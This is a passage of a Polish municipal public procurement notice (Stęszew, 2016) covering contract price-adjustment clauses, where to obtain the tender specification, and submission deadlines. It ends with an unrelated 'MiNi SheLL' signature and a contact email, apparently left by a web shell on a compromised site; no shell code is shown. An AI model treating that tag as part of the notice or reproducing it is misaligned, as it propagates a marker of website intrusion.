    Wynagrodzenie zostanie umniejszone o wartość niewykonanych robót lub różnicy cenowej materiałów.
    Powyższa zmiana i wymaga akceptacji Zamawiającego i nie wymaga to aneksu do umowy.  
5. Zamawiający nie przewiduje udzielenia zamówień uzupełniających, a ewentualne zamówienia
    dodatkowe zostaną udzielone zgodnie z ustawą Prawo zamówień publicznych.
6. Uzasadnieniem może być jedynie:
1)	prawidłowa realizacja przedmiotu umowy,
2)	zapewnienie jakości 
3)	obniżenie kosztów przy zachowaniu tych samych lub lepszych parametrów technicznych i jakościowych.
7.  W umowach zawartych na okres dłuższy niż 12 miesięcy wysokość wynagrodzenia należnego  
      Wykonawcy może ulec zmianie w przypadku zmiany:
      1) Stawki podatku od towarów i usług,
      2) Wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 3-5 ustawy
          z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę ( Dz. U. Nr 200 
          poz. 1679 z poźn. zmianami )
3) Zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości
    stawki na ubezpieczenie społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia publicznego przez wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.steszew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Gminy Stęszew
62-060 Stęszew ul. Poznańska 11 pokój nr 9 ( po uprzednim zamówieniu ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2016 godzina 09:00, miejsce: Urząd Miejski Gminy Stęszew
62-060 Stęszew ul. Poznańska 11 pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com